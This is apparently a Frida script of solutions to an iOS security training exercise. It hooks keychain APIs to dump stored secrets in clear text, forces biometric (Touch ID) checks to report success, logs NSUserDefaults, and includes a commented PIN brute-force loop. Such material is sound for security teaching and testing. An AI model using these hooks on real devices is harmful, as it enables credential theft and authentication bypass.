/**
 * Presents a "Success / Solved with Frida" alert inside the instrumented app.
 *
 * The alert is built and presented on the main queue because UIKit objects
 * must be used from the main thread.
 */
function solve301() {
  const { UIAlertController, UIAlertAction, UIApplication } = ObjC.classes;

  // No-op block used as the handler of the "OK" action.
  const noopHandler = new ObjC.Block({
    retType: 'void',
    argTypes: ['object'],
    implementation() {},
  });

  const showAlert = function () {
    // preferredStyle 1 is UIAlertControllerStyleAlert.
    const alertController = UIAlertController.alertControllerWithTitle_message_preferredStyle_(
      'Success',
      'Solved with Frida',
      1
    );
    // style 0 is UIAlertActionStyleDefault.
    const okAction = UIAlertAction.actionWithTitle_style_handler_('OK', 0, noopHandler);
    alertController.addAction_(okAction);

    const rootController = UIApplication.sharedApplication().keyWindow().rootViewController();
    rootController.presentViewController_animated_completion_(alertController, true, NULL);
  };

  ObjC.schedule(ObjC.mainQueue, showAlert);
}
/**
 * Hooks SecItemAdd in the Security framework and logs every item the app
 * adds to the keychain as "(service) account - data".
 *
 * The first argument of SecItemAdd is the attributes dictionary; it is
 * decoded with convertDict before printing. The console output therefore
 * contains the stored secret in clear text and should be handled as such.
 */
function solve302() {
  const logAddedItem = {
    onEnter(args) {
      const dict = convertDict(ObjC.Object(args[0]));
      console.log(`(${dict["svce"]}) ${dict["acct"]} - ${dict["v_Data"]}`);
    },
  };

  Module.enumerateExports("Security", {
    onMatch(exported) {
      // Only the SecItemAdd function export is of interest.
      if (exported.type !== "function" || exported.name !== "SecItemAdd") {
        return;
      }
      Interceptor.attach(exported.address, logAddedItem);
    },
    onComplete() {},
  });
}
/**
 * Prints the keychain items that getkeychain() can read from inside the
 * instrumented process.
 */
function solve303() {
  getkeychain();
}
/**
 * Hooks -[LAContext evaluatePolicy:localizedReason:reply:] and replaces the
 * app's reply block so that it is always invoked with (1, null), i.e. a
 * successful evaluation with no error.
 *
 * What this shows for app authors: the outcome of evaluatePolicy is only a
 * boolean handed to a callback inside the app's own process. Gating a secret
 * on that boolean alone can be overridden by instrumentation; protecting the
 * secret with a keychain item that requires biometric access control does
 * not rely on the callback value.
 */
function solve304() {
  // Doesn't always seem to work for some reason ...
  const liveBlocks = new Set();
  const evaluatePolicy = ObjC.classes.LAContext["- evaluatePolicy:localizedReason:reply:"];

  Interceptor.attach(evaluatePolicy.implementation, {
    onEnter(args) {
      console.log("Hooking Touch Id..");
      // args[0] is self and args[1] the selector, so args[4] is the reply block.
      console.log(args[4]);

      const replyBlock = new ObjC.Block(args[4]);
      liveBlocks.add(replyBlock); // Keep it alive until the reply has run

      const originalReply = replyBlock.implementation;
      replyBlock.implementation = function (success, authError) {
        // The real arguments are ignored; the app's callback always sees success.
        const outcome = originalReply(1, null);
        liveBlocks.delete(replyBlock);
        return outcome;
      };
    },
  });
}
/**
 * Hooks -[NSUserDefaults setObject:forKey:] and logs every write as
 * "key -> value".
 *
 * Anything an app stores through NSUserDefaults shows up here in clear text,
 * which is why credentials and tokens do not belong in user defaults.
 */
function solve305() {
  const defaultsClass = ObjC.classes.NSUserDefaults;
  const setObjectForKey = defaultsClass["- setObject:forKey:"];

  Interceptor.attach(setObjectForKey.implementation, {
    onEnter(args) {
      // args[0] is self and args[1] the selector; the method arguments follow.
      const storedValue = new ObjC.Object(args[2]);
      const storedKey = new ObjC.Object(args[3]);
      console.log(`${storedKey} -> ${storedValue}`);
    },
  });
}
/**
 * Prints the standard NSUserDefaults object and then its complete
 * dictionaryRepresentation, i.e. every default currently visible to the app.
 */
function solve306() {
  const defaultsClass = ObjC.classes.NSUserDefaults;

  console.log(defaultsClass["+ standardUserDefaults"]());

  const allDefaults = defaultsClass["+ standardUserDefaults"]().dictionaryRepresentation();
  console.log(allDefaults.toString());
}
// util functions
/**
 * Converts a keychain attribute dictionary into a plain JavaScript object
 * keyed by the attribute name.
 *
 * - "svce", "pdmn", "mdat", "cdat" and "agrp" are converted to strings.
 * - "acct" and "v_Data" are decoded as UTF-8 text from their raw bytes.
 * - Every other value is copied through unchanged.
 *
 * NOTE(review): the "acct"/"v_Data" branch assumes the value responds to
 * bytes() and length(), i.e. is NSData-like - confirm for items whose
 * account is stored as a string.
 *
 * @param {object} dict - dictionary exposing allKeys() and objectForKey_().
 * @returns {object} plain object with one property per dictionary key.
 */
function convertDict(dict) {
  const textAttributes = ["svce", "pdmn", "mdat", "cdat", "agrp"];
  const keyList = dict.allKeys();
  const converted = {};

  for (let i = 0; i < keyList.count(); i++) {
    const k = keyList.objectAtIndex_(i);
    let v = dict.objectForKey_(k);
    const name = k.toString();

    if (textAttributes.includes(name)) {
      v = new ObjC.Object(v).toString();
    }

    if (name === "acct" || name === "v_Data") {
      const data = new ObjC.Object(v);
      v = data.bytes().readUtf8String(data.length());
    }

    converted[name] = v;
  }

  return converted;
}
// modified from https://codeshare.frida.re/@lichao890427/ios-utils/
/**
 * Resolves an exported constant by symbol name, reads the pointer stored at
 * that symbol and wraps it as an ObjC object.
 *
 * @param {string} name - exported symbol name, e.g. "kSecClass".
 * @returns {object} ObjC wrapper around the pointer stored at the symbol.
 */
function getConstant(name) {
  const symbolAddress = Module.findExportByName(null, name);
  const storedPointer = Memory.readPointer(symbolAddress);
  return ObjC.Object(storedPointer);
}
/**
 * Queries the keychain once per item class (generic password, internet
 * password, certificate, key, identity) with SecItemCopyMatching and logs
 * each returned item as "(service) account - data".
 *
 * The query asks for all matches and for both attributes and data. The call
 * runs inside the instrumented process, so the output is clear-text secret
 * material and should be handled as such.
 *
 * NOTE(review): the status code returned by SecItemCopyMatching is ignored
 * and the returned array is never released - confirm this is acceptable for
 * a one-shot script.
 */
function getkeychain() {
  const NSMutableDictionary = ObjC.classes.NSMutableDictionary;
  const kCFBooleanTrue = getConstant("kCFBooleanTrue");
  const kSecReturnAttributes = getConstant("kSecReturnAttributes");
  const kSecMatchLimitAll = getConstant("kSecMatchLimitAll");
  const kSecMatchLimit = getConstant("kSecMatchLimit");
  const kSecReturnData = getConstant("kSecReturnData");
  const kSecClassGenericPassword = getConstant("kSecClassGenericPassword");
  const kSecClassInternetPassword = getConstant("kSecClassInternetPassword");
  const kSecClassCertificate = getConstant("kSecClassCertificate");
  const kSecClassKey = getConstant("kSecClassKey");
  const kSecClassIdentity = getConstant("kSecClassIdentity");
  const kSecClass = getConstant("kSecClass");

  // One query dictionary is reused; each pass overwrites the same four keys.
  const query = NSMutableDictionary.alloc().init();
  const SecItemCopyMatching = new NativeFunction(
    Module.findExportByName(null, "SecItemCopyMatching"),
    "int",
    ["pointer", "pointer"]
  );

  const itemClasses = [
    kSecClassGenericPassword,
    kSecClassInternetPassword,
    kSecClassCertificate,
    kSecClassKey,
    kSecClassIdentity,
  ];

  for (const secItemClass of itemClasses) {
    query.setObject_forKey_(kCFBooleanTrue, kSecReturnAttributes);
    query.setObject_forKey_(kSecMatchLimitAll, kSecMatchLimit);
    query.setObject_forKey_(secItemClass, kSecClass);
    query.setObject_forKey_(kCFBooleanTrue, kSecReturnData);

    // Out-parameter for the result, zeroed so "no result" reads back as null.
    const resultSlot = Memory.alloc(8);
    Memory.writePointer(resultSlot, ptr("0"));
    SecItemCopyMatching(query.handle, resultSlot);

    const resultPointer = Memory.readPointer(resultSlot);
    if (resultPointer.isNull()) {
      continue;
    }

    const items = ObjC.Object(resultPointer);
    const total = items.count();
    for (let i = 0; i < total; i++) {
      const dict = convertDict(items.objectAtIndex_(i));
      console.log(`(${dict["svce"]}) ${dict["acct"]} - ${dict["v_Data"]}`);
    }
  }
}
// var myVault = VulnerableVault.alloc().init();
// for(var i = 0; i<9999; i++){
// if(myVault["- validate:"](i))
// {
// console.log(i)
// }
// }
// 2.05